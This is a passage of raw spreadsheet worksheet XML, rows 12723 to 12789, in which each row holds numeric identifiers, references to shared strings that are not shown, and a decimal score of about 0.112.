    <row r="12723" ht="15.75" customHeight="1">
      <c r="A12723" s="1">
        <v>18418.0</v>
      </c>
      <c r="B12723" s="2">
        <v>5.269047E7</v>
      </c>
      <c r="C12723" s="2" t="s">
        <v>12235</v>
      </c>
      <c r="D12723" s="2">
        <v>1.0</v>
      </c>
      <c r="E12723" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12723" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12724" ht="15.75" customHeight="1">
      <c r="A12724" s="1">
        <v>18691.0</v>
      </c>
      <c r="B12724" s="2">
        <v>5.3599456E7</v>
      </c>
      <c r="C12724" s="2" t="s">
        <v>12236</v>
      </c>
      <c r="D12724" s="2">
        <v>1.0</v>
      </c>
      <c r="E12724" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12724" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12725" ht="15.75" customHeight="1">
      <c r="A12725" s="1">
        <v>18779.0</v>
      </c>
      <c r="B12725" s="2">
        <v>5.3808353E7</v>
      </c>
      <c r="C12725" s="2" t="s">
        <v>12237</v>
      </c>
      <c r="D12725" s="2">
        <v>1.0</v>
      </c>
      <c r="E12725" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12725" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12726" ht="15.75" customHeight="1">
      <c r="A12726" s="1">
        <v>18896.0</v>
      </c>
      <c r="B12726" s="2">
        <v>5.4152293E7</v>
      </c>
      <c r="C12726" s="2" t="s">
        <v>12238</v>
      </c>
      <c r="D12726" s="2">
        <v>1.0</v>
      </c>
      <c r="E12726" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12726" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12727" ht="15.75" customHeight="1">
      <c r="A12727" s="1">
        <v>18993.0</v>
      </c>
      <c r="B12727" s="2">
        <v>5.4423822E7</v>
      </c>
      <c r="C12727" s="2" t="s">
        <v>12239</v>
      </c>
      <c r="D12727" s="2">
        <v>1.0</v>
      </c>
      <c r="E12727" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12727" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12728" ht="15.75" customHeight="1">
      <c r="A12728" s="1">
        <v>19160.0</v>
      </c>
      <c r="B12728" s="2">
        <v>5.4898307E7</v>
      </c>
      <c r="C12728" s="2" t="s">
        <v>12240</v>
      </c>
      <c r="D12728" s="2">
        <v>1.0</v>
      </c>
      <c r="E12728" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12728" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12729" ht="15.75" customHeight="1">
      <c r="A12729" s="1">
        <v>19448.0</v>
      </c>
      <c r="B12729" s="2">
        <v>5.5729674E7</v>
      </c>
      <c r="C12729" s="2" t="s">
        <v>12241</v>
      </c>
      <c r="D12729" s="2">
        <v>1.0</v>
      </c>
      <c r="E12729" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12729" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12730" ht="15.75" customHeight="1">
      <c r="A12730" s="1">
        <v>19537.0</v>
      </c>
      <c r="B12730" s="2">
        <v>5.6025887E7</v>
      </c>
      <c r="C12730" s="2" t="s">
        <v>12242</v>
      </c>
      <c r="D12730" s="2">
        <v>1.0</v>
      </c>
      <c r="E12730" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12730" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12731" ht="15.75" customHeight="1">
      <c r="A12731" s="1">
        <v>19562.0</v>
      </c>
      <c r="B12731" s="2">
        <v>5.6105947E7</v>
      </c>
      <c r="C12731" s="2" t="s">
        <v>12243</v>
      </c>
      <c r="D12731" s="2">
        <v>1.0</v>
      </c>
      <c r="E12731" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12731" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12732" ht="15.75" customHeight="1">
      <c r="A12732" s="1">
        <v>19572.0</v>
      </c>
      <c r="B12732" s="2">
        <v>5.6136064E7</v>
      </c>
      <c r="C12732" s="2" t="s">
        <v>12244</v>
      </c>
      <c r="D12732" s="2">
        <v>1.0</v>
      </c>
      <c r="E12732" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12732" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12733" ht="15.75" customHeight="1">
      <c r="A12733" s="1">
        <v>19794.0</v>
      </c>
      <c r="B12733" s="2">
        <v>5.6839518E7</v>
      </c>
      <c r="C12733" s="2" t="s">
        <v>12245</v>
      </c>
      <c r="D12733" s="2">
        <v>1.0</v>
      </c>
      <c r="E12733" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12733" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12734" ht="15.75" customHeight="1">
      <c r="A12734" s="1">
        <v>19807.0</v>
      </c>
      <c r="B12734" s="2">
        <v>5.6905467E7</v>
      </c>
      <c r="C12734" s="2" t="s">
        <v>12246</v>
      </c>
      <c r="D12734" s="2">
        <v>1.0</v>
      </c>
      <c r="E12734" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12734" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12735" ht="15.75" customHeight="1">
      <c r="A12735" s="1">
        <v>20078.0</v>
      </c>
      <c r="B12735" s="2">
        <v>9072826.0</v>
      </c>
      <c r="C12735" s="2" t="s">
        <v>12247</v>
      </c>
      <c r="D12735" s="2">
        <v>1.0</v>
      </c>
      <c r="E12735" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12735" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12736" ht="15.75" customHeight="1">
      <c r="A12736" s="1">
        <v>20142.0</v>
      </c>
      <c r="B12736" s="2">
        <v>1.015569E7</v>
      </c>
      <c r="C12736" s="2" t="s">
        <v>12248</v>
      </c>
      <c r="D12736" s="2">
        <v>1.0</v>
      </c>
      <c r="E12736" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12736" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12737" ht="15.75" customHeight="1">
      <c r="A12737" s="1">
        <v>20643.0</v>
      </c>
      <c r="B12737" s="2">
        <v>1.4221038E7</v>
      </c>
      <c r="C12737" s="2" t="s">
        <v>12249</v>
      </c>
      <c r="D12737" s="2">
        <v>1.0</v>
      </c>
      <c r="E12737" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12737" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12738" ht="15.75" customHeight="1">
      <c r="A12738" s="1">
        <v>20798.0</v>
      </c>
      <c r="B12738" s="2">
        <v>1.5266843E7</v>
      </c>
      <c r="C12738" s="2" t="s">
        <v>12250</v>
      </c>
      <c r="D12738" s="2">
        <v>1.0</v>
      </c>
      <c r="E12738" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12738" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12739" ht="15.75" customHeight="1">
      <c r="A12739" s="1">
        <v>21963.0</v>
      </c>
      <c r="B12739" s="2">
        <v>2.9065255E7</v>
      </c>
      <c r="C12739" s="2" t="s">
        <v>12251</v>
      </c>
      <c r="D12739" s="2">
        <v>1.0</v>
      </c>
      <c r="E12739" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12739" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12740" ht="15.75" customHeight="1">
      <c r="A12740" s="1">
        <v>22561.0</v>
      </c>
      <c r="B12740" s="2">
        <v>3.8387432E7</v>
      </c>
      <c r="C12740" s="2" t="s">
        <v>12252</v>
      </c>
      <c r="D12740" s="2">
        <v>1.0</v>
      </c>
      <c r="E12740" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12740" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12741" ht="15.75" customHeight="1">
      <c r="A12741" s="1">
        <v>22693.0</v>
      </c>
      <c r="B12741" s="2">
        <v>4.2295908E7</v>
      </c>
      <c r="C12741" s="2" t="s">
        <v>12253</v>
      </c>
      <c r="D12741" s="2">
        <v>1.0</v>
      </c>
      <c r="E12741" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12741" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12742" ht="15.75" customHeight="1">
      <c r="A12742" s="1">
        <v>22739.0</v>
      </c>
      <c r="B12742" s="2">
        <v>4.408772E7</v>
      </c>
      <c r="C12742" s="2" t="s">
        <v>12254</v>
      </c>
      <c r="D12742" s="2">
        <v>1.0</v>
      </c>
      <c r="E12742" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12742" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12743" ht="15.75" customHeight="1">
      <c r="A12743" s="1">
        <v>23053.0</v>
      </c>
      <c r="B12743" s="2">
        <v>5.0244576E7</v>
      </c>
      <c r="C12743" s="2" t="s">
        <v>12255</v>
      </c>
      <c r="D12743" s="2">
        <v>1.0</v>
      </c>
      <c r="E12743" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12743" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12744" ht="15.75" customHeight="1">
      <c r="A12744" s="1">
        <v>23415.0</v>
      </c>
      <c r="B12744" s="2">
        <v>5611939.0</v>
      </c>
      <c r="C12744" s="2" t="s">
        <v>12256</v>
      </c>
      <c r="D12744" s="2">
        <v>1.0</v>
      </c>
      <c r="E12744" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12744" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12745" ht="15.75" customHeight="1">
      <c r="A12745" s="1">
        <v>23855.0</v>
      </c>
      <c r="B12745" s="2">
        <v>8249749.0</v>
      </c>
      <c r="C12745" s="2" t="s">
        <v>12257</v>
      </c>
      <c r="D12745" s="2">
        <v>1.0</v>
      </c>
      <c r="E12745" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12745" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12746" ht="15.75" customHeight="1">
      <c r="A12746" s="1">
        <v>24976.0</v>
      </c>
      <c r="B12746" s="2">
        <v>1.2675442E7</v>
      </c>
      <c r="C12746" s="2" t="s">
        <v>12258</v>
      </c>
      <c r="D12746" s="2">
        <v>1.0</v>
      </c>
      <c r="E12746" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12746" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12747" ht="15.75" customHeight="1">
      <c r="A12747" s="1">
        <v>25004.0</v>
      </c>
      <c r="B12747" s="2">
        <v>1.2721521E7</v>
      </c>
      <c r="C12747" s="2" t="s">
        <v>12259</v>
      </c>
      <c r="D12747" s="2">
        <v>1.0</v>
      </c>
      <c r="E12747" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12747" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12748" ht="15.75" customHeight="1">
      <c r="A12748" s="1">
        <v>25077.0</v>
      </c>
      <c r="B12748" s="2">
        <v>1.2881708E7</v>
      </c>
      <c r="C12748" s="5" t="s">
        <v>12260</v>
      </c>
      <c r="D12748" s="2">
        <v>1.0</v>
      </c>
      <c r="E12748" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12748" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12749" ht="15.75" customHeight="1">
      <c r="A12749" s="1">
        <v>25267.0</v>
      </c>
      <c r="B12749" s="2">
        <v>1.3392199E7</v>
      </c>
      <c r="C12749" s="2" t="s">
        <v>12261</v>
      </c>
      <c r="D12749" s="2">
        <v>1.0</v>
      </c>
      <c r="E12749" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12749" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12750" ht="15.75" customHeight="1">
      <c r="A12750" s="1">
        <v>25528.0</v>
      </c>
      <c r="B12750" s="2">
        <v>1.4221037E7</v>
      </c>
      <c r="C12750" s="2" t="s">
        <v>12262</v>
      </c>
      <c r="D12750" s="2">
        <v>1.0</v>
      </c>
      <c r="E12750" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12750" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12751" ht="15.75" customHeight="1">
      <c r="A12751" s="1">
        <v>26350.0</v>
      </c>
      <c r="B12751" s="2">
        <v>1.6805756E7</v>
      </c>
      <c r="C12751" s="2" t="s">
        <v>12263</v>
      </c>
      <c r="D12751" s="2">
        <v>1.0</v>
      </c>
      <c r="E12751" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12751" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12752" ht="15.75" customHeight="1">
      <c r="A12752" s="1">
        <v>26490.0</v>
      </c>
      <c r="B12752" s="2">
        <v>1.7515263E7</v>
      </c>
      <c r="C12752" s="2" t="s">
        <v>12264</v>
      </c>
      <c r="D12752" s="2">
        <v>1.0</v>
      </c>
      <c r="E12752" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12752" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12753" ht="15.75" customHeight="1">
      <c r="A12753" s="1">
        <v>26777.0</v>
      </c>
      <c r="B12753" s="2">
        <v>1.8509541E7</v>
      </c>
      <c r="C12753" s="2" t="s">
        <v>12265</v>
      </c>
      <c r="D12753" s="2">
        <v>1.0</v>
      </c>
      <c r="E12753" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12753" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12754" ht="15.75" customHeight="1">
      <c r="A12754" s="1">
        <v>27002.0</v>
      </c>
      <c r="B12754" s="2">
        <v>1.9948284E7</v>
      </c>
      <c r="C12754" s="2" t="s">
        <v>12266</v>
      </c>
      <c r="D12754" s="2">
        <v>1.0</v>
      </c>
      <c r="E12754" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12754" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12755" ht="15.75" customHeight="1">
      <c r="A12755" s="1">
        <v>27043.0</v>
      </c>
      <c r="B12755" s="2">
        <v>2.0214371E7</v>
      </c>
      <c r="C12755" s="2" t="s">
        <v>12267</v>
      </c>
      <c r="D12755" s="2">
        <v>1.0</v>
      </c>
      <c r="E12755" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12755" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12756" ht="15.75" customHeight="1">
      <c r="A12756" s="1">
        <v>27326.0</v>
      </c>
      <c r="B12756" s="2">
        <v>2.1412736E7</v>
      </c>
      <c r="C12756" s="2" t="s">
        <v>12268</v>
      </c>
      <c r="D12756" s="2">
        <v>1.0</v>
      </c>
      <c r="E12756" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12756" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12757" ht="15.75" customHeight="1">
      <c r="A12757" s="1">
        <v>28016.0</v>
      </c>
      <c r="B12757" s="2">
        <v>2.4340949E7</v>
      </c>
      <c r="C12757" s="2" t="s">
        <v>12269</v>
      </c>
      <c r="D12757" s="2">
        <v>1.0</v>
      </c>
      <c r="E12757" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12757" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12758" ht="15.75" customHeight="1">
      <c r="A12758" s="1">
        <v>28102.0</v>
      </c>
      <c r="B12758" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C12758" s="2" t="s">
        <v>12270</v>
      </c>
      <c r="D12758" s="2">
        <v>1.0</v>
      </c>
      <c r="E12758" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12758" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12759" ht="15.75" customHeight="1">
      <c r="A12759" s="1">
        <v>28549.0</v>
      </c>
      <c r="B12759" s="2">
        <v>2.6861579E7</v>
      </c>
      <c r="C12759" s="2" t="s">
        <v>12271</v>
      </c>
      <c r="D12759" s="2">
        <v>1.0</v>
      </c>
      <c r="E12759" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12759" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12760" ht="15.75" customHeight="1">
      <c r="A12760" s="1">
        <v>28864.0</v>
      </c>
      <c r="B12760" s="2">
        <v>2.9065254E7</v>
      </c>
      <c r="C12760" s="2" t="s">
        <v>12251</v>
      </c>
      <c r="D12760" s="2">
        <v>1.0</v>
      </c>
      <c r="E12760" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12760" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12761" ht="15.75" customHeight="1">
      <c r="A12761" s="1">
        <v>29289.0</v>
      </c>
      <c r="B12761" s="2">
        <v>3.1115177E7</v>
      </c>
      <c r="C12761" s="2" t="s">
        <v>12272</v>
      </c>
      <c r="D12761" s="2">
        <v>1.0</v>
      </c>
      <c r="E12761" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12761" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12762" ht="15.75" customHeight="1">
      <c r="A12762" s="1">
        <v>29739.0</v>
      </c>
      <c r="B12762" s="2">
        <v>3.4645254E7</v>
      </c>
      <c r="C12762" s="2" t="s">
        <v>12273</v>
      </c>
      <c r="D12762" s="2">
        <v>1.0</v>
      </c>
      <c r="E12762" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12762" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12763" ht="15.75" customHeight="1">
      <c r="A12763" s="1">
        <v>30677.0</v>
      </c>
      <c r="B12763" s="2">
        <v>4.2295907E7</v>
      </c>
      <c r="C12763" s="2" t="s">
        <v>12253</v>
      </c>
      <c r="D12763" s="2">
        <v>1.0</v>
      </c>
      <c r="E12763" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12763" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12764" ht="15.75" customHeight="1">
      <c r="A12764" s="1">
        <v>31444.0</v>
      </c>
      <c r="B12764" s="2">
        <v>5.0244575E7</v>
      </c>
      <c r="C12764" s="2" t="s">
        <v>12255</v>
      </c>
      <c r="D12764" s="2">
        <v>1.0</v>
      </c>
      <c r="E12764" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12764" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12765" ht="15.75" customHeight="1">
      <c r="A12765" s="1">
        <v>31799.0</v>
      </c>
      <c r="B12765" s="2">
        <v>5.241881E7</v>
      </c>
      <c r="C12765" s="2" t="s">
        <v>12274</v>
      </c>
      <c r="D12765" s="2">
        <v>1.0</v>
      </c>
      <c r="E12765" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12765" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12766" ht="15.75" customHeight="1">
      <c r="A12766" s="1">
        <v>32113.0</v>
      </c>
      <c r="B12766" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C12766" s="2" t="s">
        <v>12275</v>
      </c>
      <c r="D12766" s="2">
        <v>1.0</v>
      </c>
      <c r="E12766" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12766" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12767" ht="15.75" customHeight="1">
      <c r="A12767" s="1">
        <v>32422.0</v>
      </c>
      <c r="B12767" s="2">
        <v>5.6447284E7</v>
      </c>
      <c r="C12767" s="2" t="s">
        <v>12276</v>
      </c>
      <c r="D12767" s="2">
        <v>1.0</v>
      </c>
      <c r="E12767" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12767" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12768" ht="15.75" customHeight="1">
      <c r="A12768" s="1">
        <v>32509.0</v>
      </c>
      <c r="B12768" s="2">
        <v>5716188.0</v>
      </c>
      <c r="C12768" s="2" t="s">
        <v>12277</v>
      </c>
      <c r="D12768" s="2">
        <v>1.0</v>
      </c>
      <c r="E12768" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12768" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12769" ht="15.75" customHeight="1">
      <c r="A12769" s="1">
        <v>32605.0</v>
      </c>
      <c r="B12769" s="2">
        <v>5820485.0</v>
      </c>
      <c r="C12769" s="2" t="s">
        <v>12278</v>
      </c>
      <c r="D12769" s="2">
        <v>1.0</v>
      </c>
      <c r="E12769" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12769" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12770" ht="15.75" customHeight="1">
      <c r="A12770" s="1">
        <v>32957.0</v>
      </c>
      <c r="B12770" s="2">
        <v>6511268.0</v>
      </c>
      <c r="C12770" s="2" t="s">
        <v>12279</v>
      </c>
      <c r="D12770" s="2">
        <v>1.0</v>
      </c>
      <c r="E12770" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12770" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12771" ht="15.75" customHeight="1">
      <c r="A12771" s="1">
        <v>33310.0</v>
      </c>
      <c r="B12771" s="2">
        <v>7509335.0</v>
      </c>
      <c r="C12771" s="2" t="s">
        <v>12280</v>
      </c>
      <c r="D12771" s="2">
        <v>1.0</v>
      </c>
      <c r="E12771" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12771" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12772" ht="15.75" customHeight="1">
      <c r="A12772" s="1">
        <v>33890.0</v>
      </c>
      <c r="B12772" s="2">
        <v>9174485.0</v>
      </c>
      <c r="C12772" s="2" t="s">
        <v>12281</v>
      </c>
      <c r="D12772" s="2">
        <v>1.0</v>
      </c>
      <c r="E12772" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12772" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12773" ht="15.75" customHeight="1">
      <c r="A12773" s="1">
        <v>8037.0</v>
      </c>
      <c r="B12773" s="2">
        <v>5.2833977E7</v>
      </c>
      <c r="C12773" s="2" t="s">
        <v>12282</v>
      </c>
      <c r="D12773" s="2">
        <v>1.0</v>
      </c>
      <c r="E12773" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12773" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="12774" ht="15.75" customHeight="1">
      <c r="A12774" s="1">
        <v>14423.0</v>
      </c>
      <c r="B12774" s="2">
        <v>3.9256156E7</v>
      </c>
      <c r="C12774" s="5" t="s">
        <v>12283</v>
      </c>
      <c r="D12774" s="2">
        <v>1.0</v>
      </c>
      <c r="E12774" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12774" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="12775" ht="15.75" customHeight="1">
      <c r="A12775" s="1">
        <v>15361.0</v>
      </c>
      <c r="B12775" s="2">
        <v>4.2712467E7</v>
      </c>
      <c r="C12775" s="2" t="s">
        <v>12284</v>
      </c>
      <c r="D12775" s="2">
        <v>1.0</v>
      </c>
      <c r="E12775" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12775" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="12776" ht="15.75" customHeight="1">
      <c r="A12776" s="1">
        <v>17489.0</v>
      </c>
      <c r="B12776" s="2">
        <v>4.9953181E7</v>
      </c>
      <c r="C12776" s="2" t="s">
        <v>12285</v>
      </c>
      <c r="D12776" s="2">
        <v>1.0</v>
      </c>
      <c r="E12776" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12776" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="12777" ht="15.75" customHeight="1">
      <c r="A12777" s="1">
        <v>17507.0</v>
      </c>
      <c r="B12777" s="2">
        <v>5.0009784E7</v>
      </c>
      <c r="C12777" s="2" t="s">
        <v>12286</v>
      </c>
      <c r="D12777" s="2">
        <v>1.0</v>
      </c>
      <c r="E12777" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12777" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="12778" ht="15.75" customHeight="1">
      <c r="A12778" s="1">
        <v>18123.0</v>
      </c>
      <c r="B12778" s="2">
        <v>5.1779843E7</v>
      </c>
      <c r="C12778" s="2" t="s">
        <v>12287</v>
      </c>
      <c r="D12778" s="2">
        <v>1.0</v>
      </c>
      <c r="E12778" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12778" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="12779" ht="15.75" customHeight="1">
      <c r="A12779" s="1">
        <v>19040.0</v>
      </c>
      <c r="B12779" s="2">
        <v>5.4568858E7</v>
      </c>
      <c r="C12779" s="2" t="s">
        <v>12288</v>
      </c>
      <c r="D12779" s="2">
        <v>1.0</v>
      </c>
      <c r="E12779" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12779" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="12780" ht="15.75" customHeight="1">
      <c r="A12780" s="1">
        <v>10194.0</v>
      </c>
      <c r="B12780" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C12780" s="2" t="s">
        <v>12289</v>
      </c>
      <c r="D12780" s="2">
        <v>1.0</v>
      </c>
      <c r="E12780" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12780" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="12781" ht="15.75" customHeight="1">
      <c r="A12781" s="1">
        <v>14508.0</v>
      </c>
      <c r="B12781" s="2">
        <v>3.9703335E7</v>
      </c>
      <c r="C12781" s="2" t="s">
        <v>12290</v>
      </c>
      <c r="D12781" s="2">
        <v>1.0</v>
      </c>
      <c r="E12781" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12781" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="12782" ht="15.75" customHeight="1">
      <c r="A12782" s="1">
        <v>25508.0</v>
      </c>
      <c r="B12782" s="2">
        <v>1.4143796E7</v>
      </c>
      <c r="C12782" s="2" t="s">
        <v>12291</v>
      </c>
      <c r="D12782" s="2">
        <v>1.0</v>
      </c>
      <c r="E12782" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12782" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="12783" ht="15.75" customHeight="1">
      <c r="A12783" s="1">
        <v>27908.0</v>
      </c>
      <c r="B12783" s="2">
        <v>2.3726284E7</v>
      </c>
      <c r="C12783" s="2" t="s">
        <v>12292</v>
      </c>
      <c r="D12783" s="2">
        <v>1.0</v>
      </c>
      <c r="E12783" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12783" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="12784" ht="15.75" customHeight="1">
      <c r="A12784" s="1">
        <v>717.0</v>
      </c>
      <c r="B12784" s="2">
        <v>2.0646688E7</v>
      </c>
      <c r="C12784" s="2" t="s">
        <v>12293</v>
      </c>
      <c r="D12784" s="2">
        <v>1.0</v>
      </c>
      <c r="E12784" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12784" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="12785" ht="15.75" customHeight="1">
      <c r="A12785" s="1">
        <v>15595.0</v>
      </c>
      <c r="B12785" s="2">
        <v>4.3462739E7</v>
      </c>
      <c r="C12785" s="5" t="s">
        <v>12294</v>
      </c>
      <c r="D12785" s="2">
        <v>1.0</v>
      </c>
      <c r="E12785" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12785" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="12786" ht="15.75" customHeight="1">
      <c r="A12786" s="1">
        <v>4772.0</v>
      </c>
      <c r="B12786" s="2">
        <v>4.3437144E7</v>
      </c>
      <c r="C12786" s="2" t="s">
        <v>12295</v>
      </c>
      <c r="D12786" s="2">
        <v>1.0</v>
      </c>
      <c r="E12786" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12786" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="12787" ht="15.75" customHeight="1">
      <c r="A12787" s="1">
        <v>22361.0</v>
      </c>
      <c r="B12787" s="2">
        <v>3.4763804E7</v>
      </c>
      <c r="C12787" s="2" t="s">
        <v>12296</v>
      </c>
      <c r="D12787" s="2">
        <v>1.0</v>
      </c>
      <c r="E12787" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12787" s="2">
        <v>0.1120218579234973</v>
      </c>
    </row>
    <row r="12788" ht="15.75" customHeight="1">
      <c r="A12788" s="1">
        <v>16995.0</v>
      </c>
      <c r="B12788" s="2">
        <v>4.8393041E7</v>
      </c>
      <c r="C12788" s="2" t="s">
        <v>12297</v>
      </c>
      <c r="D12788" s="2">
        <v>1.0</v>
      </c>
      <c r="E12788" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12788" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="12789" ht="15.75" customHeight="1">
      <c r="A12789" s="1">
        <v>32154.0</v>
      </c>
      <c r="B12789" s="2">
        <v>5.4289943E7</v>
      </c>
      <c r="C12789" s="2" t="s">
        <v>12298</v>
      </c>
      <c r="D12789" s="2">
        <v>1.0</v>
      </c>
      <c r="E12789" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12789" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
